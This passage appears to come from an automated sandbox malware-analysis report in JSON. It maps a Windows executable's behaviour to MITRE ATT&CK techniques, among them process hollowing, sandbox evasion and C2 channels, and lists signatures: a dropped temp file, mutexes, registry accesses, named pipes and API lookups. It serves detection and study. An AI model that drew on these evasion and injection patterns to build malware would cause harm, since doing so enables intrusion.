"https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75240000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74E00000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ctbzjelz.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"ctbzjelz.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005548)\n 